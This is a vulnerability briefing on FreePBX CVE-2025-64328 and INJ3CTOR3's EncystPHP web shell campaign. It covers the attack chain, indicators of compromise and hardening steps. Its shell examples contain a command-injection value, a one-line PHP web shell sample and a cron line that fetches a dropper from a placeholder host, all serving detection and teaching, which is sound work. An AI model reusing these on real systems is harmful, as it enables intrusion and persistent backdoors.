category vuln
published March 2026
read_time 11 min
cve CVE-2025-64328 — CVSS 8.6
status CISA KEV / Active

FreePBX CVE-2025-64328: Mass Exploitation and the EncystPHP Web Shell

A post-authentication command injection flaw in the FreePBX Endpoint Manager has been under active mass exploitation since December 2025. The threat group INJ3CTOR3 is deploying a sophisticated PHP web shell called EncystPHP across vulnerable systems globally, with over 900 confirmed compromises as of late February 2026. A patch has existed since November 2025. Hundreds of organizations have not applied it.

FreePBX is an open-source web-based interface for managing the Asterisk telephony engine — widely deployed by businesses, MSPs, and hosted VoIP providers to run on-premises PBX infrastructure. Its broad adoption in SMB environments, combined with a history of internet-exposed administrative panels running outdated software, makes it a recurring target. This campaign follows a pattern INJ3CTOR3 has executed before, against the same class of infrastructure, with updated tooling.

The Shadowserver Foundation, in collaboration with the Canadian Centre for Cyber Security, confirmed on February 24, 2026 that over 900 FreePBX instances remain actively compromised and running web shells. CISA added CVE-2025-64328 to its Known Exploited Vulnerabilities catalog on February 3, with a federal agency remediation deadline of February 24. The campaign is ongoing.

The Vulnerability: CVE-2025-64328

CVE-2025-64328 is a CWE-78 OS command injection vulnerability — Improper Neutralization of Special Elements used in an OS Command — with a CVSS v3.1 score of 8.6 (High). It resides in the FreePBX Endpoint Manager module, specifically in the filestore module's SSH test-connection functionality.

The vulnerable code path runs through the testconnection -> check_ssh_connect() function. User-supplied input passed through this function is not properly sanitized before being incorporated into an OS command. An authenticated user with access to the FreePBX Administration Panel can craft input that injects arbitrary shell commands, which execute as the asterisk user — the system account under which the Asterisk telephony daemon runs.

affected versions

The vulnerability affects FreePBX Endpoint Manager versions 17.0.2.36 and above, up to but not including 17.0.3. The fix is available in version 17.0.3, patched by Sangoma in November 2025. Exploitation began in December 2025 — one month after the patch was available. Systems compromised during that window may remain backdoored even after patching, because EncystPHP establishes persistence independent of the original vulnerability.

The "post-authentication" qualifier has not meaningfully limited attacker reach. INJ3CTOR3 operators use automated scanners to identify internet-facing FreePBX admin panels, then attempt authentication using default credentials, previously leaked credentials, and brute force. Many FreePBX deployments retain factory-default or weak administrative passwords. The authentication step is a low barrier, not a reliable protection.

"The impact is that any user with access to the FreePBX Administration panel could leverage this vulnerability to execute arbitrary shell commands on the underlying host. An attacker could leverage this to obtain remote access to the system as the asterisk user." — Sangoma / FreePBX Security Advisory, November 2025
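The injection shape described in this section, as an added illustration in shell. This is not FreePBX's code (the real flaw is in PHP and invokes ssh); the `sh -c` probe with `printf` is a hypothetical stand-in so the example runs offline, and the function names and payload are constructed for the example. The unsafe variant splices the caller's host string into a command line that a second shell re-parses, which is exactly what CWE-78 names; the hardened variant allow-lists the value against the grammar a host literal needs and passes it as its own argument so nothing re-parses it.

```bash
#!/usr/bin/env bash
# Added illustration of the CWE-78 pattern behind CVE-2025-64328, in shell.
# Hypothetical stand-in for a "test SSH connection" routine: the probe is a
# printf rather than ssh so it runs offline. Not FreePBX's own code.

# UNSAFE: the host string is spliced into a command line that sh re-parses,
# so ; | & ` $( ) inside it become command separators and substitutions.
test_connection_unsafe() {
    local host="$1"
    sh -c "printf 'probing %s\n' $host"
}

# HARDENED: (1) allow-list the value (hostname / IPv4 / IPv6 characters only,
# nothing that looks like an option), (2) never hand it to a shell string;
# pass it as a separate argv element so no re-parsing can happen.
test_connection_safe() {
    local host="$1"
    case "$host" in
        ""|*[!A-Za-z0-9.:-]*|-*)
            echo "rejected: $host" >&2
            return 2 ;;
    esac
    printf 'probing %s\n' "$host"
}

# Run directly: the unsafe path executes the appended command as the invoking
# user (the asterisk account in a real deployment); the safe path refuses it
# and still serves an ordinary host. Constructed payload, not a captured request.
demo() {
    local payload='pbx.example.net; echo INJECTED-as-$(id -un)'
    echo "[unsafe]"; test_connection_unsafe "$payload"
    echo "[safe]";   test_connection_safe "$payload" || echo "(blocked, rc=$?)"
    test_connection_safe "pbx.example.net"
}
if [ "${BASH_SOURCE[0]}" = "$0" ]; then demo; fi
```

The allow-list is deliberately narrower than "escape the metacharacters": escaping protects the shell boundary but still lets a value beginning with `-` reach the probed program as an option, which is why the safe variant rejects that shape too.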

Threat Actor: INJ3CTOR3

INJ3CTOR3 is a financially motivated threat group with a documented history of targeting VoIP and PBX infrastructure going back to at least 2020. Their operations follow a consistent template: identify an exploitable vulnerability in widely deployed telephony software, scan for exposed instances at scale, gain administrative access, deploy a PHP web shell for persistence, and monetize through outbound call fraud and unauthorized use of telephony resources.

Their campaign history shows deliberate platform targeting. In 2020 they exploited CVE-2019-19006, a critical authentication bypass in FreePBX. In 2022 they pivoted to Elastix systems via CVE-2021-45461. CVE-2025-64328 represents their third documented major campaign targeting the same ecosystem — VoIP infrastructure built on FreePBX or Elastix running the Asterisk engine. The tooling has been updated each time; the strategic target has not changed.

FortiGuard Labs confirmed attribution to INJ3CTOR3 based on overlaps with previously documented TTPs, the characteristic behavior of the EncystPHP payload, and infrastructure connections. The dropper was downloaded from the IP address 45[.]234[.]176[.]202, the address to which the domain crm[.]razatelefonia[.]pro resolves; the site presents as a VoIP management system and is used as attacker-controlled download infrastructure.

The Attack Chain

attack chain — CVE-2025-64328 / EncystPHP
01
Reconnaissance & Target Identification
Automated scanning identifies internet-facing FreePBX admin panels running vulnerable Endpoint Manager versions. Scanners check for characteristic response patterns in the admin UI.
MITRE: T1595 (Active Scanning)
02
Authentication
Attackers authenticate using default credentials, brute-forced passwords, or previously compromised account data. Admin panel access is obtained.
MITRE: T1110 (Brute Force) / T1078 (Valid Accounts)
03
Command Injection via CVE-2025-64328
Crafted input is submitted to the SSH test-connection function in the filestore module. Unsanitized input executes as OS commands under the asterisk user. A Base64-encoded PHP payload is delivered via HTTP POST to the FreePBX web UI, written to /var/www/html/admin/views/ajax.php.
MITRE: T1190 (Exploit Public-Facing Application) / T1059 (Command and Scripting Interpreter)
04
EncystPHP Dropper Fetched
The injected command uses wget to pull the EncystPHP dropper from 45[.]234[.]176[.]202. A secondary dropper, k.php, is also retrieved from the same host. Logs are cleared immediately after download.
MITRE: T1105 (Ingress Tool Transfer)
05
Web Shell Deployment & Fortification
EncystPHP modifies permissions of legitimate FreePBX components — ajax.php and model.php — to 000, rendering them inaccessible. It harvests database credentials from /etc/freepbx.conf, deletes competing web shells found on the system, removes existing cron jobs, and purges known FreePBX user accounts including ampuser, svc_freepbx, bluej, emoadmin, and others.
MITRE: T1505.003 (Web Shell) / T1222 (File and Directory Permissions Modification) / T1070 (Indicator Removal)
06
Persistence: Privileged Account & SSH Backdoor
A root-level user account named newfpbx is created with hardcoded credentials. Multiple existing account passwords are reset to a single attacker-controlled value. An attacker SSH public key is injected into the system. SSH port 22 is confirmed open via system configuration. File timestamps on web shell instances are forged to match legitimate FreePBX files.
MITRE: T1136 (Create Account) / T1098.004 (SSH Authorized Keys) / T1070.006 (Timestomp)
07
Persistence: Multi-Stage Cron Infrastructure
A crontab entry is established that downloads the secondary dropper k.php every minute. Additional web shell instances are written to at least twelve distinct paths under /var/www/html/, including digium_phones/, rest_phones/, phones/, and freepbxphones/. Removal of any single instance does not disrupt attacker access.
MITRE: T1053.003 (Scheduled Task: Cron) / T1505.003 (Web Shell)
08
Monetization & Post-Compromise Activity
The EncystPHP "Ask Master" interface enables querying active Asterisk channels, SIP peers, and call routing configuration. Compromised systems issue unauthorized outbound calls — typically to premium-rate numbers — for toll fraud revenue. The shell also supports file system enumeration, lateral movement, and staging of additional payloads.
MITRE: T1496 (Resource Hijacking) / T1021 (Remote Services)

EncystPHP: Capability Profile

EncystPHP is a purpose-built web shell designed specifically for FreePBX and Elastix environments. Unlike generic PHP web shells, it contains telephony-specific functionality that reflects deep familiarity with the target platform.

The shell masquerades as the legitimate FreePBX file ajax.php, placed at /var/www/html/admin/views/ajax.php — a path consistent with genuine FreePBX application structure. Incoming requests are authenticated via MD5-hashed passwords compared against hardcoded hash values in the code, so only the attacker with the correct password can operate the interface. Once authenticated, it exposes an interface labeled "Ask Master" with predefined operational commands for FreePBX-specific tasks: enumerating active Asterisk channels, listing SIP peers, retrieving FreePBX and Elastix configuration files, and executing arbitrary shell commands.

The anti-forensic capability is deliberate and layered. Timestamps on deployed web shell instances are forged to match timestamps of legitimate FreePBX files, defeating simple timestamp-based integrity checks. PHP error reporting is disabled to suppress diagnostic output. The shell scans the filesystem for other PHP-based web shells — identifying them by patterns such as Base64 decode functions and PHP shell execution calls — and removes them, eliminating competition from other threat actors on the same host. Log entries are tampered with at multiple stages. The Endpoint Manager module itself may be removed post-compromise to prevent Sangoma's own detection tooling from triggering.

patching does not equal remediation

Applying the version 17.0.3 patch closes the CVE-2025-64328 attack vector but does not remove EncystPHP or any other persistence already established on a compromised system. Because EncystPHP maintains access via injected SSH keys, hardcoded accounts, cron-based dropper refresh, and distributed web shell instances across twelve or more paths, a patched but previously compromised system remains fully backdoored. Any system that was exposed during December 2025 through the present must be treated as compromised and fully audited, not simply patched.

Global Scope and Confirmed Infections

Shadowserver's February 24, 2026 data confirmed over 900 distinct FreePBX instances running active web shells. The geographic distribution reflects the global deployment of FreePBX infrastructure:

  • United States: approximately 401 confirmed instances — the largest single concentration
  • Brazil: approximately 51 instances
  • Canada: approximately 43 instances
  • Germany: approximately 40 instances
  • France: approximately 36 instances
  • Additional infections in the United Kingdom, Italy, the Netherlands, and smaller numbers distributed globally

These are confirmed, active compromises with persistent web shells still running — not merely vulnerable instances. Systems compromised and subsequently cleaned, or remaining infected without externally detectable web shells, are not reflected in this count. The actual scope of the campaign is larger.

Indicators of Compromise

The following artifacts have been confirmed by FortiGuard Labs and Shadowserver. Organizations running FreePBX should search for these indicators on any system that was internet-exposed during the affected window.

# Attacker download infrastructure
IP:     45[.]234[.]176[.]202
Domain: crm[.]razatelefonia[.]pro

# Primary web shell path
/var/www/html/admin/views/ajax.php

# Secondary dropper deployment paths (partial list)
/var/www/html/digium_phones/
/var/www/html/rest_phones/
/var/www/html/phones/
/var/www/html/freepbxphones/

# Dropper filenames
c          (initial bash dropper)
k.php      (secondary PHP dropper)
test.sh    (bash script)

# Unauthorized accounts to check for
newfpbx    (root-level, hardcoded credentials)

# FreePBX accounts deleted by EncystPHP
ampuser, svc_freepbx, freepbx_svc, bluej,
nahda, FreePBX_setup, emoadmin, nvd0rz

# Credential file accessed by attacker
/etc/freepbx.conf

# Persistence mechanism
Crontab entry fetching k.php on a one-minute interval
SSH authorized_keys modified with attacker public key

Because EncystPHP forges file timestamps, standard integrity checks against modification times are not reliable on compromised systems. Verification should use cryptographic hashing against known-good file states.

Remediation and Hardening

  1. Apply the patch: Update FreePBX Endpoint Manager to version 17.0.3 or later. Sangoma also released an emergency EDGE module fix for deployments that cannot immediately move to 17.0.3 — apply whichever is appropriate for your deployment track.
  2. Treat any exposed system as compromised: Any FreePBX instance running a vulnerable version with an internet-accessible admin panel should be fully investigated before being returned to service. Patching alone is insufficient if compromise occurred before the patch was applied.
  3. Audit and remove web shell artifacts: Check all paths listed in the IOC section. Search the entire web root for PHP files matching web shell patterns — Base64 decode calls, PHP shell execution functions, hardcoded hash values. Restore affected files from verified clean backups rather than relying on in-place scanning.
  4. Purge unauthorized accounts and SSH keys: Remove the newfpbx account and any others created during the compromise window. Rotate all credentials. Review and clean authorized_keys on the system. Confirm SSH access is restricted to known-good keys only.
  5. Remove unauthorized cron entries: Check the crontab for the web server user, root, and any other accounts. Any entry fetching remote PHP files or executing unusual commands should be removed.
  6. Restrict admin panel access at the network layer: The FreePBX Administration Panel should not be reachable from the public internet. Firewall rules should restrict access to specific, trusted source addresses or require VPN. This is not a workaround for the vulnerability — it is a baseline hardening requirement that would have prevented exploitation in the first place.
  7. Review call detail records: If compromise is confirmed, audit CDRs for unauthorized calls during the compromise window. Toll fraud losses from compromised PBX systems can accumulate quickly, particularly when outbound PSTN trunks connect to carriers billing per-call to high-cost international destinations.
  8. Monitor for ongoing activity: Watch for unauthorized outbound SIP calls, anomalous call volumes or unusual destinations, unexpected outbound connections from the PBX host, and SSH authentication from unrecognized source addresses.
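An added triage helper that covers steps 3 to 5 above and the hashing caveat from the IOC section in one pass. It is not Sangoma or FreePBX tooling; the function names, the argument layout and the `baseline` format (lines of `sha256  relative/path` for known-good files under the web root) are assumptions made for this example, and the tree it builds for its demo is constructed sample data, not a capture from a real host. It is read-only by design: it reports and exits 1 when anything is found, and never cleans.

```bash
#!/usr/bin/env bash
# Added triage helper for the EncystPHP artifacts in this briefing. Not
# Sangoma/FreePBX tooling. Read-only: it reports findings, it never cleans.
# Every path is a parameter, so it runs against the live host or a mounted image.

sha256_of() {   # hex SHA-256 of one file, with whichever tool the host has
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi | cut -d' ' -f1
}

# Emit one "tag detail" line per finding. Arguments:
#   webroot crontab authorized_keys known_good_keys passwd baseline
# baseline = lines of "sha256  relative/path" for known-good FreePBX files (assumed format).
encyst_checks() {
    local webroot="$1" cron="$2" authkeys="$3" goodkeys="$4" passwd="$5" baseline="$6"
    local f want path have

    # (a) PHP pairing an obfuscation decoder with a shell-execution call: the
    #     web-shell signature the briefing describes (EncystPHP hunts rivals the same way).
    find "$webroot" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
        if grep -Eq 'base64_decode|gzinflate|str_rot13' "$f" 2>/dev/null &&
           grep -Eq '(^|[^A-Za-z0-9_])(shell_exec|system|passthru|exec|popen|proc_open)[[:space:]]*\(' "$f" 2>/dev/null; then
            echo "webshell-pattern $f"
        fi
    done

    # (b) Legitimate components set to mode 000 by the "fortification" step.
    find "$webroot" -type f \( -name ajax.php -o -name model.php \) -perm 000 2>/dev/null | sed 's/^/perm-000 /'

    # (c) Cron entry re-fetching the k.php secondary dropper.
    [ -r "$cron" ] && grep -E '(wget|curl)[^#]*k\.php' "$cron" | sed 's/^/cron-dropper /'

    # (d) The hardcoded newfpbx account, plus any other uid-0 login besides root.
    [ -r "$passwd" ] && awk -F: '$1=="newfpbx" || ($3==0 && $1!="root") {print "rogue-account", $1}' "$passwd"

    # (e) authorized_keys entries absent from the operator's known-good list.
    [ -r "$authkeys" ] && [ -r "$goodkeys" ] && grep -vxFf "$goodkeys" "$authkeys" | sed 's/^/unknown-sshkey /'

    # (f) Content digests against the clean baseline: EncystPHP timestomps,
    #     so mtime proves nothing and only the hash does.
    [ -r "$baseline" ] && while read -r want path; do
        [ -n "$path" ] || continue
        if [ -f "$webroot/$path" ]; then have=$(sha256_of "$webroot/$path"); else have=missing; fi
        [ "$have" = "$want" ] || echo "hash-mismatch $path ($have)"
    done < "$baseline"
    return 0
}

# Print the report; exit 0 if clean, 1 if anything was found.
encyst_triage() {
    local report
    report=$(encyst_checks "$@")
    [ -z "$report" ] || printf '%s\n' "$report"
    [ -z "$report" ]
}

# Constructed sample tree (not data from a real host) with one of each artifact.
build_demo_tree() {
    local d; d=$(mktemp -d)
    mkdir -p "$d/www/admin/views" "$d/etc"
    printf '<?php @eval(base64_decode($_POST["c"])); system($_GET["x"]); ?>\n' > "$d/www/admin/views/ajax.php"
    : > "$d/www/admin/config.php"                                   # clean stand-in, empty
    printf '<?php // legitimate\n' > "$d/www/admin/model.php"; chmod 000 "$d/www/admin/model.php"
    printf '* * * * * wget -q -O /tmp/k.php http://example.invalid/k.php\n' > "$d/etc/cron"
    printf 'root:x:0:0::/root:/bin/bash\nasterisk:x:1000:1000::/var/lib/asterisk:/bin/sh\nnewfpbx:x:0:0::/root:/bin/bash\n' > "$d/etc/passwd"
    printf 'ssh-ed25519 AAAAoperator operator@pbx\n' > "$d/etc/good_keys"
    printf 'ssh-ed25519 AAAAoperator operator@pbx\nssh-ed25519 AAAAattacker x\n' > "$d/etc/authorized_keys"
    # SHA-256 of the empty file for both entries: config.php matches, the replaced ajax.php does not
    printf '%s  admin/config.php\n%s  admin/views/ajax.php\n' \
        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 \
        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 > "$d/etc/baseline"
    echo "$d"
}

run_demo() {
    local d; d=$(build_demo_tree)
    encyst_triage "$d/www" "$d/etc/cron" "$d/etc/authorized_keys" "$d/etc/good_keys" "$d/etc/passwd" "$d/etc/baseline" || true
    chmod 600 "$d/www/admin/model.php"; rm -rf "$d"
}

if [ "${BASH_SOURCE[0]}" = "$0" ]; then run_demo; fi
```

Against the constructed tree the report carries six lines, one per artifact class (`webshell-pattern`, `perm-000`, `cron-dropper`, `rogue-account`, `unknown-sshkey`, `hash-mismatch`), and nothing for the clean `config.php`. On a real host, run it with the live paths (or the mount point of a disk image) and a baseline taken from a verified-clean installation of the same FreePBX version; a `perm-000` or `webshell-pattern` hit on `admin/views/ajax.php` is the strongest single signal, and a clean report only means these particular artifacts are absent, not that the host is uncompromised.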

VoIP and PBX infrastructure does not receive the same patching urgency as traditional IT systems in many organizations. This campaign succeeds specifically because of that gap. FreePBX is voice infrastructure, but it runs on Linux, exposes a web interface, manages user accounts, and sits on a network segment with access to telephony trunks. It requires the same patch discipline and exposure management as any other internet-facing system. INJ3CTOR3 has exploited this assumption three times now. The attack surface has not changed.

— end of briefing